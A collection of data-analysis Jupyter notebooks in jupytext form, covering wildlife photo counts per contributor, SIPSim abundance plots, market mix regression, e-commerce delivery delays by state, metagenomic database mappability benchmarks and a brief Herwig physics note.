record/.ipynb_checkpoints/visualization-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + active=""
# Script for counting the number of times an animal was photographed
# Author: <NAME>
# Date: May 25 2016
# -
import GetPropertiesAPI as GP
from collections import Counter
import pandas as pd
import importlib
importlib.reload(GP)
import statistics as s
import operator
from collections import defaultdict
import csv
import matplotlib.pyplot as plt
# +
aid_list = []
gidAidDict = {}
for gid in range(1,9407):
aid = GP.getAnnotID(gid)
aid_list.append(aid)
gidAidDict[gid] = aid
aid_list = [aid for aid in aid_list if aid is not None]
# -
aids = []
for aid_l in aid_list:
for aid in aid_l:
aids.append(aid)
aidContribTupList = []
for aid in aids:
contrib = GP.getImageFeature(aid,'image_contributor_tag')
aidContribTupList.append((aid,contrib[0]))
# +
aidNidMap = {}
aidNamesMap = {}
aidNidTupList = [] # modified
for aid in aids:
nid = GP.getImageFeature(aid,'nids')
aidNidMap[aid] = nid
aidNidTupList.append((aid,nid[0]))
# -
nids = []
for aid in aidNidMap.keys():
nids.append(aidNidMap[aid][0])
nids = [nid for nid in nids if nid > 0]
counter_nid = Counter(nids)
gidAidDict
aidGidTupList = [] # key : aid and value : gid # modified
for gid in gidAidDict.keys():
if gidAidDict[gid] != None:
for aid in gidAidDict[gid]:
aidGidTupList.append((aid,gid))
aidGidDf = pd.DataFrame(aidGidTupList,columns = ['AID','GID'])
aidNidDf = pd.DataFrame(aidNidTupList,columns = ['AID','NID'])
aidContribDf = pd.DataFrame(aidContribTupList,columns = ['AID','CONTRIBUTOR'])
aidNidDf = aidNidDf[(aidNidDf['NID']>0)]
aidGidNidDf = pd.merge(aidGidDf,aidNidDf,left_on = 'AID',right_on = 'AID')
aidGidNidContribDf = pd.merge(aidGidNidDf,aidContribDf,left_on = 'AID',right_on = 'AID')
aidGidNidContribDf.to_csv('results.csv',index=False)
# +
with open('results.csv') as f: # read from csv file into a key : GID and value : CONTRIBUTOR
reader = csv.DictReader(f)
gidContribMap = { line['GID']: line['CONTRIBUTOR'] for line in reader }
len(gidContribMap)
# +
ContribTotal = {} # dict with key : CONTRIBUTOR and value: Total photos taken
for gid,contrib in gidContribMap.items():
ContribTotal[contrib] = ContribTotal.get(contrib,0) + 1
print(s.mean(ContribTotal.values()))
print(s.stdev(ContribTotal.values()))
# -
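As a side note, the tallying pattern used in the cell above (`dict.get` with a default of 0, then `statistics` over the values) can be sketched on a tiny hypothetical example:

```python
import statistics as s

gid_contrib = {'g1': 'alice', 'g2': 'alice', 'g3': 'bob'}  # hypothetical GID -> contributor map
totals = {}
for contrib in gid_contrib.values():
    # count photos per contributor with a default of 0 for unseen keys
    totals[contrib] = totals.get(contrib, 0) + 1

print(totals)                   # {'alice': 2, 'bob': 1}
print(s.mean(totals.values()))  # 1.5
```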
with open('results.csv') as f2: # read from csv file into a Dict with key : AID and value : GID, NID, CONTRIBUTOR
reader2 = csv.DictReader(f2)
aidToGidNidContribMap = { line['AID']: [line['GID'], line['NID'], line['CONTRIBUTOR']] for line in reader2 }
NidContribTotal = {} # dict with key : NID, CONTRIBUTOR and value: Total photos taken
for aid,(gid,nid,contrib) in aidToGidNidContribMap.items():
NidContribTotal[nid,contrib] = NidContribTotal.get((nid,contrib),0) + 1
csv_out = csv.writer(open('nidtoContributor.csv', 'w')) # rename file, results of Nid to Contributor to Total
csv_out.writerow(['NID', 'CONTRIBUTOR', 'TOTAL'])
for (Nid, Contrib), value in NidContribTotal.items():
csv_out.writerow([Nid, Contrib, value])
# +
#from collections import defaultdict
averageCountofPictures = defaultdict(list) # dict where key : NID and values: list of pictures taken per photographer
for (nid, contrib), total in NidContribTotal.items():
averageCountofPictures[nid].append(total)
#averageCountofPictures
# +
countUniquePhotoPerPic = {} # dict where key : NID and value : # of CONTRIBUTORS
for (nid, contrib), total in NidContribTotal.items():
    countUniquePhotoPerPic[nid] = countUniquePhotoPerPic.get(nid, 0) + 1
#countUniquePhotoPerPic['741']
# -
# +
#JUST LOOK FROM HERE
# -
# Arguments : Required Feature
# Accepted Features: species_texts, age_months_est, exemplar_flags, sex_texts, yaw_texts, quality_texts,image_contributor_tag
# Returns : Returns Dictionary of total feature
def getContributorFeature(feature):
#SHOULD WE HAVE THIS????
with open('results.csv') as f: # read from csv file into a Dict with key : AID and value : GID, NID, CONTRIBUTOR
reader = csv.DictReader(f)
aidToGidNidContribMap = { line['AID']: [line['GID'], line['NID'], line['CONTRIBUTOR']] for line in reader }
contribToFeatureMap = defaultdict(list) # dict where key : contributor and values : List of feature
for aid,(gid,nid,contrib) in aidToGidNidContribMap.items():
contribToFeatureMap[contrib].append(GP.getImageFeature(aid, feature)[0])
contribAnimFeatCount = {} # dict where key : contributor and values : total of specific feature
    for key in contribToFeatureMap.keys():
contribAnimFeatCount[key]=dict(Counter(contribToFeatureMap[key]))
return contribAnimFeatCount
# +
#m={}
#x={}
#m=getContributorFeature("species_texts")
#x=getContributorFeature("sex_texts")
#print(m)
# +
#FOR ALL MALES, FEMALES, UNKNOWN INTO CSV FILE
malesTotal={}
femaleTotal={}
unknownTotal={}
for contrib, feature in x.items(): #change x
malesTotal[contrib]=feature.get('Male', 0)
femaleTotal[contrib]=feature.get('Female', 0)
unknownTotal[contrib]=feature.get('UNKNOWN SEX', 0)
maleTotal = sum(malesTotal.values())
femaleTotal = sum(femaleTotal.values())
unknownTotal = sum(unknownTotal.values())
csv_out = csv.writer(open('contribSexTotal.csv', 'w')) # sex totals summed over all contributors
csv_out.writerow(['FEATURE', 'MALE', 'FEMALE', 'UNKNOWN SEX'])
csv_out.writerow(['sex_texts', maleTotal, femaleTotal, unknownTotal])
# -
# Arguments : ContributorToFeatureDict , Required Specific Feature
# Accepted Specific Features: sex_texts = "Male", "Female", "UNKNOWN SEX", etc.
# Returns : None (writes a CSV mapping each contributor to its count of the specific feature)
def getContributorSpecificFeature(contribAnimFeatCount, specificfeat):
contribSpecFeatureMap={}
for contrib, feature in contribAnimFeatCount.items():
contribSpecFeatureMap[contrib]=feature.get(specificfeat , 0)
csv_out = csv.writer(open('contrib'+ specificfeat +'Map.csv', 'w')) #used for plotting later
csv_out.writerow(['CONTRIBUTOR', specificfeat])
for contrib, specfeature in contribSpecFeatureMap.items():
csv_out.writerow([contrib, specfeature])
# +
#getContributorSpecificFeature(contribAnimSexCount, "UNKNOWN SEX")
getContributorSpecificFeature(contribAnimSexCount, 'Female')
# -
# Arguments : csv_file , Required Specific Feature
# Accepted Specific Features: sex_texts = "Male", "Female", "UNKNOWN SEX", etc.
# Returns : NONE
def creategraph(csv_file, specific_feature):
data = pd.read_csv(csv_file, sep=',',header=0, index_col =0) #csv_file
data.plot(kind='bar')
plt.ylabel('Number of ' + specific_feature + ' taken')
plt.xlabel('Contributor')
    plt.title('Contributor to ' + specific_feature + ' Totals')
plt.show()
#creategraph('contribMaleMap.csv', "Male")
creategraph('contribFemaleMap.csv', 'Female')
|
Notebooks_DEPRECATED/IndividualAnimalPhotoCount.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R [conda env:SIPSim_py3]
# language: R
# name: conda-env-SIPSim_py3-r
# ---
# # Goal
#
# * re-plotting SIPSim validation plot (example of OTU distribution in control vs labeled-treatment gradient)
# # Setting variables
#workDir = '/home/nick/notebook/SIPSim/dev/bac_genome1147/validation/'
#genomeDir = '/var/seq_data/ncbi_db/genome/Jan2016/bac_complete_spec-rep1_rn/'
#R_dir = '/home/nick/notebook/SIPSim/lib/R/'
#figureDir = '/home/nick/notebook/SIPSim/figures/bac_genome_n1147/'
workDir = '/ebio/abt3_projects/methanogen_host_evo/SIPSim_pt2/data/bac_genome1147/validation/'
# # Init
library(ggplot2)
library(dplyr)
library(tidyr)
library(gridExtra)
# BD for G+C of 0 or 100
BD.GCp0 = 0 * 0.098 + 1.66
BD.GCp50 = 0.5 * 0.098 + 1.66
BD.GCp100 = 1 * 0.098 + 1.66
# cutoff to call real incorporator
BD_shift.cut = 0.001
# # Plotting abundance distributions (paper figure)
# ## Loading OTU abundances
# +
# loading file
F = file.path(workDir, 'OTU_n2_abs1e9.txt')
df.abs = read.delim(F, sep='\t')
F = file.path(workDir, 'OTU_n2_abs1e9_PCR_subNorm.txt')
df.sub = read.delim(F, sep='\t')
lib.reval = c('1' = 'control',
'2' = 'treatment')
df.abs = mutate(df.abs, library = plyr::revalue(as.character(library), lib.reval))
df.sub = mutate(df.sub, library = plyr::revalue(as.character(library), lib.reval))
# -
# ## Loading incorp identity
#
# * Which taxa are actually incorporators
# +
F = file.path(workDir, 'ampFrags_BD-shift.txt')
df.shift = read.delim(F, sep='\t') %>%
filter(library == 2) %>%
mutate(true_incorp = median >= BD_shift.cut)
# status
df.shift$median %>% table %>% print
df.shift$true_incorp %>% table %>% print
df.shift %>% dim %>% print
df.shift %>% head(n=3)
# -
# ## Formatting
# +
# absolute abundances
df.abs %>% dim %>% print
df.abs = df.abs %>%
left_join(df.shift %>% dplyr::select(taxon, true_incorp),
c('taxon')) %>%
mutate(true_incorp = ifelse(is.na(true_incorp), FALSE, true_incorp),
alpha = ifelse(true_incorp==TRUE, 0.5, 0.15))
df.abs %>% dim %>% print
# subsampled abundances
df.sub %>% dim %>% print
df.sub = df.sub %>%
left_join(df.shift %>% dplyr::select(taxon, true_incorp),
c('taxon')) %>%
mutate(true_incorp = ifelse(is.na(true_incorp), FALSE, true_incorp),
alpha = ifelse(true_incorp==TRUE, 0.5, 0.15))
df.sub %>% dim %>% print
# status
df.abs %>% head(n=3) %>% print
df.sub %>% head(n=3) %>% print
# +
# creating relative abundances for df.sub
df.sub.rel = df.sub %>%
group_by(library, fraction) %>%
mutate(total_count = sum(count)) %>%
ungroup() %>%
mutate(count = count / total_count) %>%
dplyr::select(-total_count)
df.sub.rel %>% head(n=3)
# -
# ## Plotting
x.lab = expression(paste('Buoyant density (g ml' ^ '-1', ')'))
# +
# plotting absolute abundances
p = ggplot(df.abs, aes(BD_mid, count, fill=taxon)) +
geom_vline(xintercept=c(BD.GCp50), linetype='dashed', alpha=0.5) +
scale_x_continuous(expand=c(0,0)) +
labs(x='Buoyant density') +
facet_grid(library ~ .) +
theme_bw() +
theme(
axis.title.y = element_text(vjust=1),
axis.title.x = element_blank(),
legend.position = 'none',
plot.margin=unit(c(1,1,0.1,1), "cm")
)
p1 = p +
geom_area(alpha=0.2, stat='identity', position='dodge') +
geom_area(data = df.abs %>% filter(true_incorp == TRUE),
alpha=0.5, stat='identity', position='dodge') +
labs(y='Pre-sequencing\nsimulation\n(absolute abundance)')
options(repr.plot.width=7, repr.plot.height=3.5)
plot(p1)
# +
# plotting absolute abundances of subsampled taxa
p = ggplot(df.sub, aes(BD_mid, count, fill=taxon)) +
geom_vline(xintercept=c(BD.GCp50), linetype='dashed', alpha=0.5) +
scale_x_continuous(expand=c(0,0)) +
labs(x=x.lab) +
facet_grid(library ~ .) +
theme_bw() +
theme(
legend.position = 'none'
)
p2 = p +
geom_area(alpha=0.2, stat='identity', position='dodge') +
geom_area(data = df.sub %>% filter(true_incorp == TRUE),
alpha=0.5, stat='identity', position='dodge') +
labs(y='Post-sequencing\nsimulation\n(absolute abundance)') +
theme(
axis.title.y = element_text(vjust=1),
axis.title.x = element_blank(),
plot.margin=unit(c(0.1,1,0.1,1), "cm")
)
options(repr.plot.width=7, repr.plot.height=3.5)
plot(p2)
# +
# plotting relative abundances of subsampled taxa
p3 = p +
geom_area(alpha=0.5, stat='identity', position='fill') +
geom_area(aes(alpha=alpha), stat='identity', position='fill') +
#geom_line(aes(alpha=true_incorp), color='black', size=0.2, position='fill') +
geom_vline(xintercept=c(BD.GCp50), linetype='dashed', alpha=0.5) +
labs(y='Post-sequencing\nsimulation\n(relative abundance)') +
theme(
axis.title.y = element_text(vjust=1),
plot.margin=unit(c(0.1,1,1,1.35), "cm")
)
options(repr.plot.width=7, repr.plot.height=3.5)
plot(p3)
# +
# combining plots
p.comb = cowplot::ggdraw() +
geom_rect(aes(xmin=0, ymin=0, xmax=1, ymax=1), fill='white') +
cowplot::draw_plot(p1, 0.0, 0.69, 0.99, 0.31) +
cowplot::draw_plot(p2, 0.01, 0.38, 0.98, 0.31) +
cowplot::draw_plot(p3, 0.0, 0.0, 0.99, 0.38)
options(repr.plot.width=7, repr.plot.height=7)
plot(p.comb)
# -
# ### Saving figures
F = file.path(workDir, 'abundDist_example.pdf')
ggsave(F, p.comb, width=9, height=9)
cat('File written:', F, '\n')
F = file.path(workDir, 'abundDist_example.tiff')
ggsave(F, p.comb, width=9, height=9, dpi=300)
cat('File written:', F, '\n')
F = file.path(workDir, 'abundDist_example.png')
ggsave(F, p.comb, width=9, height=9, dpi=250)
cat('File written:', F, '\n')
|
ipynb/bac_genome/n1147_pt2/validation_plot.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Import Libraries
# + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5"
import numpy as np # linear algebra
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from ipykernel import kernelapp as app
from scipy import stats
from statsmodels.tools.eval_measures import rmse
import os
print(os.listdir("../11). Market Mix Modeling using Python"))
# Any results you write to the current directory are saved as output.
# -
# ## Data Pre-Processing
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"
#Read Advertising Data dummy dataset
raw_df = pd.read_csv("../11). Market Mix Modeling using Python/Advertising.csv")
raw_df.head()
# + _uuid="9d9ec0d2d9f80e26f04fc71fccc92fd2b48db3c3"
#remove extra 'Unnamed' column
df = raw_df.loc[:, ~raw_df.columns.str.contains('^Unnamed')]
df.head()
# -
df.columns
# + _uuid="e3dfc54a64dd97d93b24ba320c3f716cd4945d0a"
#Data Description
df.describe()
# + [markdown] _uuid="ba5bcf6bfdb494aa3c53e725eba848762649b797"
# ## Exploratory Data Analysis (EDA)
# + _uuid="9d3d09883d9de8a680b483ed07cbfaa7e9b7cc3d"
corr = df.corr()
sns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, annot=True, cmap=sns.diverging_palette(220, 20, as_cmap=True))
# + _uuid="56dd3957ba66b4cab2ceb93de2395e5faf5a48c3"
sns.pairplot(df)
# + _uuid="1ff44e086aaceb70f04a23a63cd081b3fd16a2ef"
# Setting X and y variables
X = df.loc[:, df.columns != 'sales']
y = df['sales']
# Building Random Forest model
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_absolute_error as mae
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.25, random_state=0)
model = RandomForestRegressor(random_state=1)
model.fit(X_train, y_train)
pred = model.predict(X_test)
# Visualizing Feature Importance
feat_importances = pd.Series(model.feature_importances_, index=X.columns)
feat_importances.nlargest(25).plot(kind='barh',figsize=(10,10))
# -
# ## OLS Model
# +
# OLS, short for Ordinary Least Squares, is a method used to estimate the parameters in a linear regression model.
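As a quick illustration (a minimal sketch with made-up numbers, independent of the advertising data), the OLS slope and intercept for a single predictor have a closed form:

```python
# Closed-form OLS for simple linear regression: y ~ intercept + slope * x
x = [1, 2, 3, 4, 5]              # hypothetical predictor values
y = [2.0, 4.1, 5.9, 8.2, 10.0]   # hypothetical responses
n = len(x)
mx, my = sum(x) / n, sum(y) / n
# slope = covariance(x, y) / variance(x)
slope = sum((xi - mx) * (yi - my) for xi, yi in zip(x, y)) / sum((xi - mx) ** 2 for xi in x)
intercept = my - slope * mx
print(round(slope, 2), round(intercept, 2))  # slope ~ 2.01, intercept ~ 0.01
```

statsmodels performs the same estimation (generalized to several predictors) behind `sm.ols(...).fit()` below.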
# + _uuid="dfcc09c071d33a4322d4983544e7a83effaef6a2"
import statsmodels.formula.api as sm
model = sm.ols(formula="sales~TV+radio+newspaper", data=df).fit()
print(model.summary())
# -
# 1. The Adj. R-squared is 0.896, which means that almost 90% of the variation in our data can be explained by our model,
# which is pretty good!
#
# 2. The p-values for TV and radio are less than 0.000, but the p-value for newspaper is 0.86,
# which indicates that newspaper spend has no significant impact on sales.
# Defining Actual and Predicted values
y_pred = model.predict()
labels = df['sales']
df_temp = pd.DataFrame({'Actual': labels, 'Predicted':y_pred})
df_temp.head()
# Creating Line Graph
from matplotlib.pyplot import figure
figure(num=None, figsize=(15, 6), dpi=80, facecolor='w', edgecolor='k')
y1 = df_temp['Actual']
y2 = df_temp['Predicted']
plt.plot(y1, label = 'Actual')
plt.plot(y2, label = 'Predicted')
plt.legend()
plt.show()
# + _uuid="ab1a0a9ac9e097cec028374e65421b1ebccc18fe"
#Model 2 Parameters, error, and r square
print('Parameters: ', model.params)
print("************************")
print('R2: ', model.rsquared)
print("************************")
print('Standard errors: ', model.bse)
print("************************")
print('Root Mean Square Error: ',rmse(labels,y_pred))
# + _uuid="61f00f1d159abd0a15a5a76d2e6fc4e7a3717c16"
#Actual and predicted values
y_pred = model.predict()
df1 = pd.DataFrame({'Actual': labels, 'Predicted': y_pred})
df1.head(10)
|
11). Market Mix Modeling using Python/market-mix-modeling-using-python.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Hypotheses 11 and 12
#
# ### H11: The delay time changes according to the state of delivery
# ### H12: The delay time is related to the product category
from pyspark.sql import SparkSession, functions as F
spark = SparkSession.builder.getOrCreate()
# +
orders_df = spark.read \
.option('quote', '\"') \
.option('escape', '\"') \
.csv('./dataset/olist_orders_dataset.csv', header=True, multiLine=True)
customer_df = spark.read \
.option('quote', '\"') \
.option('escape', '\"') \
.csv('./dataset/olist_customers_dataset.csv', header=True, multiLine=True)
orders_df.printSchema()
customer_df.printSchema()
df = orders_df.join(customer_df, on='customer_id')  # join on the column name to avoid a duplicate customer_id column
# -
df.limit(5).toPandas()
late_df = df.filter(F.col('order_delivered_customer_date') > F.col('order_estimated_delivery_date'))
late_df.toPandas()
# +
aux_df = late_df.select(F.col('order_estimated_delivery_date').alias('estimated_date'),
F.col('order_delivered_customer_date').alias('deliver_date'),
F.col('customer_state').alias('state'))
aux_df = aux_df.withColumn('delay_in_days', F.datediff(F.col('deliver_date'), F.col('estimated_date')))
aux_df.show()
# -
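The `F.datediff` step above counts whole days between the two dates; the same quantity in plain Python (with hypothetical dates for illustration) is:

```python
from datetime import date

def delay_in_days(estimated, delivered):
    # positive when the order arrived after the estimated delivery date
    return (delivered - estimated).days

print(delay_in_days(date(2018, 1, 10), date(2018, 1, 15)))  # 5
```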
aux_df = aux_df.groupBy('state').avg().orderBy('avg(delay_in_days)', ascending=False)
aux_df = aux_df.withColumn('avg(delay_in_days)', F.round(aux_df['avg(delay_in_days)'], 2))
aux_df.show(27)
aux_df.toPandas().plot(kind='bar', x='state', figsize=(16, 6))
# # Conclusion
#
# ## H11
# ### Hypothesis 11 is valid, as all states have different average delays
#
# ## H12
# ### Hypothesis 12 was discarded due to data inconsistency
|
hypothesis_11_12.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R [conda env:UpSetR]
# language: R
# name: conda-env-UpSetR-r
# ---
# # Goal
#
# The aim of this notebook is to compare the mappability of profiles obtained with the different databases on CAMI challenge data
# # Init
library(tidyverse)
library(stringr)
library(forcats)
library(cowplot)
library(data.table)
library(glue)
# # Var
work_dir = "/ebio/abt3_projects/Struo/struo_benchmark/data/profiles_cami"
# ## Dataframe with Kraken classification reads
# Kraken proportion of reads mapped
database = c("GTDB", "progenomes", "defaults")
kraken_logs = map(database,
function(x) file.path(work_dir, x, "logs/kraken") %>%
list.files(., full.names = T)) %>% unlist
# +
read_klog = function(path){
# Sample community name
community_name = path %>%
basename %>%
str_replace(., ".log", "")
# Database
db = path %>%
str_split("/", simplify = T) %>%
nth(8)
# Read file line by line
# Keep lines with classified and unclassified reads
# create table with data for each sample
readLines(path) %>%
data.frame(txt = .) %>%
tail(., n=2) %>%
separate(txt, into = c("seqs", "category"), sep = "sequences") %>%
mutate(seqs = as.numeric(seqs),
category = c("classified", "unclassified"),
community = rep(community_name, 2),
database = rep(db, 2))
}
# +
kraken_classified_complete = map_df(kraken_logs, function(x) read_klog(x)) %>%
arrange(community)
kraken_classified_complete %>% head
# -
kraken_classified = kraken_classified_complete %>%
group_by(database, community) %>%
mutate(sum = sum(seqs)) %>%
ungroup %>%
mutate(proportion = round((seqs/sum)* 100, 2)) %>%
select(-sum) %>%
filter(category == "classified") %>%
arrange(community, -proportion) %>%
mutate(database = fct_recode(database, RefSeq = "defaults", proGenomes = "progenomes")) %>%
mutate(database = fct_relevel(database, c("RefSeq", "proGenomes", "GTDB")))
kraken_classified %>% head
# ## Read Bracken logs
# Kraken proportion of reads mapped
database = c("GTDB", "progenomes", "defaults")
bracken_logs = map(database,
function(x) file.path(work_dir, x, "logs/bracken") %>%
list.files(., full.names = T)) %>% unlist
read_blog = function(path){
# Synth community name
community_name = path %>%
basename %>%
str_replace(., ".log", "")
# Database
db = path %>%
str_split("/", simplify = T) %>%
nth(8)
# Read file line by line
# Keep lines with total and used reads at the species level
# create table with data for each sample
readLines(path) %>%
data.frame(txt = .) %>%
filter(str_detect(txt," Total reads in sample") | str_detect(txt,"Total reads kept")) %>%
separate(txt, into = c("txt", "seqs"), sep = ":") %>%
select("seqs") %>%
mutate(seqs = as.numeric(seqs),
category = c("Total", "Used"),
community = rep(community_name, 2),
database = rep(db, 2))
}
# +
bracken_used_complete = map_df(bracken_logs, function(x) read_blog(x)) %>%
arrange(community) %>%
mutate(database = fct_recode(database, RefSeq = "defaults", proGenomes = "progenomes")) %>%
mutate(database = fct_relevel(database, c("RefSeq", "proGenomes", "GTDB")))
bracken_used_complete %>% head
# -
# ## Bracken species table
bracken_tables = function(file_path){
tax_levels = c("Domain", "Phylum", "Class",
                   "Order", "Family", "Genus", "Species")
id_ranks = c("id_cellular", "id_Domain", "id_Phylum", "id_Class",
"id_Order", "id_Family", "id_Genus",
"id_Species")
# Read table, select columns and separate taxonomy
tbl_raw = read_delim(file_path, delim = "\t") %>%
select(-c(name, taxonomy_lvl)) %>%
separate(taxonomy, into = tax_levels, sep = ";") %>%
separate(taxIDs, into = id_ranks, sep = ";") %>%
select(-id_cellular)
    # Create fraction and count tables
# Raw counts
tbl_count = tbl_raw %>%
select(-ends_with("_frac"))
    # Relative abundances
tbl_fraction = tbl_raw %>%
select(-ends_with("_num"))
percentages = tbl_fraction %>%
select(ends_with("_frac")) %>%
(function(x) (x * 100))
tbl_fraction = tbl_fraction %>%
select(-ends_with("_frac")) %>%
bind_cols(percentages)
list(relabund = tbl_fraction, count = tbl_count)
}
# Paths
defaults_bracken_path = file.path(work_dir, "defaults/kraken/all-combined-bracken.tsv")
progenomes_bracken_path = file.path(work_dir, "progenomes/kraken/all-combined-bracken.tsv")
gtdb_bracken_path = file.path(work_dir, "GTDB/kraken/all-combined-bracken.tsv")
# +
# Defaults
bracken_cami_defaults = bracken_tables(defaults_bracken_path)
defaults_relabund = bracken_cami_defaults$relabund
# progenomes
bracken_cami_progenomes = bracken_tables(progenomes_bracken_path)
progenomes_relabund = bracken_cami_progenomes$relabund
# GTDB
bracken_cami_gtdb = bracken_tables(gtdb_bracken_path)
gtdb_relabund = bracken_cami_gtdb$relabund
# -
# ## Read HUMANn2 Files
hmn_names = c('Gene_Family',
'H_S001',
'H_S002',
'H_S003',
'H_S004',
'H_S005')
# ### Read HUMANn2 Logs
read_hlog = function(path){
# Synth community name
community_name = path %>%
basename %>%
str_replace(., ".log", "")
# Database
db = path %>%
str_split("/", simplify = T) %>%
nth(8)
# Read file line by line
# Keep lines with total and used reads at the species level
# create table with data for each sample
grep_cmd = glue('grep "Unaligned reads after" {path}', path = path)
system(grep_cmd, intern = T) %>%
data.frame(txt = .) %>%
separate(txt, into = c("Stamp", "txt", "unmapped"), sep = ": ") %>%
select("unmapped") %>%
mutate(unmapped = str_replace(unmapped, " %", "")) %>%
mutate(unmapped = as.numeric(unmapped),
category = c("Nucleotide", "Translated"),
community = rep(community_name, 2),
database = rep(db, 2))
}
# Humann2 proportion of reads unmapped
database = c("GTDB", "progenomes", "defaults")
humann_logs = map(database,
function(x) file.path(work_dir, x, "logs/humann2") %>%
list.files(., full.names = T)) %>% unlist
# +
human_unmapped = map_df(humann_logs, function(x) read_hlog(x)) %>%
arrange(community) %>%
mutate(database = fct_recode(database, ChocoPhlAn = "defaults", proGenomes = "progenomes")) %>%
mutate(database = fct_relevel(database, c("ChocoPhlAn", "proGenomes", "GTDB")))
human_mapped = human_unmapped %>%
mutate(proportion = 100 - unmapped) %>%
select(-unmapped)
human_mapped %>% head
# -
# # Assessment of results
# Colors
dbs_pallete = c("#969696", "#1879bf", "#1db628")
# ## Tax Profile
# ### Kraken - proportion of mapped reads
# Summary of mapped reads per database
kraken_classified %>%
group_by(database) %>%
summarise(mean = mean(proportion), sd = sd(proportion))
kraken_classified %>% head
# +
options(repr.plot.width = 4, repr.plot.height = 5)
k_plt = kraken_classified %>%
ggplot(aes(x = database, y = (proportion))) +
geom_jitter(position=position_jitter(0.1), aes(alpha = 0.01), color = "#A9A9A9") +
stat_summary(fun.data=mean_sdl, geom="pointrange", color="black") +
theme_light() +
theme(axis.text.x = element_text(angle = 45, hjust = 1, size = 15),
axis.text.y = element_text(size = 12),
axis.title.y = element_text(size = 15),
legend.position = "none") +
labs(x = "Database", y = "Mapped reads (%)", title = "Kraken") +
lims(y = c(0,100))
plot(k_plt)
# -
# ### Bracken - proportion of used read at species level
# +
# Determine the number of reads actually used by Bracken
br_total = bracken_used_complete %>%
filter(category == "Total") %>%
pull(seqs)
br_used = bracken_used_complete %>%
filter(category == "Used") %>%
pull(seqs)
br_proportion = bracken_used_complete %>%
filter(category == "Used") %>%
select(community, database) %>%
mutate(proportion = (br_used /br_total)*100)
br_proportion %>% head
# -
# Summary of used reads per database
br_proportion %>%
group_by(database) %>%
summarise(mean = mean(proportion), sd = sd(proportion))
# +
options(repr.plot.width = 4, repr.plot.height = 5)
b_plt = br_proportion %>%
ggplot(aes(x = database, y = proportion)) +
geom_jitter(position=position_jitter(0.1), aes(alpha = 0.01), color = "#A9A9A9") +
stat_summary(fun.data=mean_sdl, geom="pointrange", color="black") +
theme_light() +
theme(axis.text.x = element_text(angle = 45, hjust = 1, size = 15),
axis.text.y = element_text(size = 12),
axis.title.y = element_text(size = 15),
legend.position = "none") +
labs(x = "Database", y = "Mapped reads (%)", title = "Bracken") +
lims(y = c(0,100))
plot(b_plt)
# -
# ### Kraken-Bracken Plots
# Kraken and Bracken mapping
options(repr.plot.width = 8, repr.plot.height = 5)
plot_grid(k_plt, b_plt, nrow = 1, labels = "AUTO")
# ## Functional Profile
# ### HUMANn2 proportion of mapped reads after nucleotide search
hmn2_proportion = human_mapped %>%
filter(category == "Nucleotide") %>%
select(-category)
# +
options(repr.plot.width = 4, repr.plot.height = 5)
hmn2_nuc_plt = hmn2_proportion %>%
ggplot(aes(x = database, y = proportion)) +
geom_jitter(position=position_jitter(0.1), aes(alpha = 0.01), color = "#A9A9A9") +
stat_summary(fun.data=mean_sdl, geom="pointrange", color="black") +
theme_light() +
theme(axis.text.x = element_text(angle = 45, hjust = 1, size = 15),
axis.text.y = element_text(size = 12),
axis.title.y = element_text(size = 15),
legend.position = "none") +
labs(x = "Database", y = "Mapped reads (%)", title = "HUMANn2 - Nucleotide") +
lims(y = c(0,100))
plot(hmn2_nuc_plt)
# -
# ### HUMANn2 proportion of mapped reads after translated search
hmn2_proportion = human_mapped %>%
filter(category == "Translated") %>%
select(-category)
# +
options(repr.plot.width = 4, repr.plot.height = 5)
hmn2_trns_plt = hmn2_proportion %>%
ggplot(aes(x = database, y = proportion)) +
geom_jitter(position=position_jitter(0.1), aes(alpha = 0.01), color = "#A9A9A9") +
stat_summary(fun.data=mean_sdl, geom="pointrange", color="black") +
theme_light() +
theme(axis.text.x = element_text(angle = 45, hjust = 1, size = 15),
axis.text.y = element_text(size = 12),
axis.title.y = element_text(size = 15),
legend.position = "none") +
labs(x = "Database", y = "Mapped reads (%)", title = "HUMANn2 - Translated") +
lims(y = c(0,100))
plot(hmn2_trns_plt)
# -
# # All plots combined
# Kraken and Bracken mapping
options(repr.plot.width = 6, repr.plot.height = 9)
final_plot = plot_grid(k_plt, b_plt, hmn2_nuc_plt, hmn2_trns_plt, nrow = 2, labels = "AUTO")
final_plot
# + deletable=false editable=false run_control={"frozen": true}
# # Save plot
# plot_file = "./images/CAMI_plot_combined.png"
# save_plot(filename = plot_file, plot = final_plot,
# base_height = 9, base_width = 6, dpi = 300)
# -
# # Session Info
sessionInfo()
|
benchmark/04_CAMI_stats.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: a-herwig
# language: python
# name: herwig
# ---
# # Introduction
#
# Andrzej generated events with clusters at about 1 GeV to "remove" the conditional effects.
# This notebook is to check whether the inputs are truly what we wanted.
#
#
# Andrzej investigated this and found that there were photons radiated, which is why we observed cluster masses smeared around 1 GeV.
#
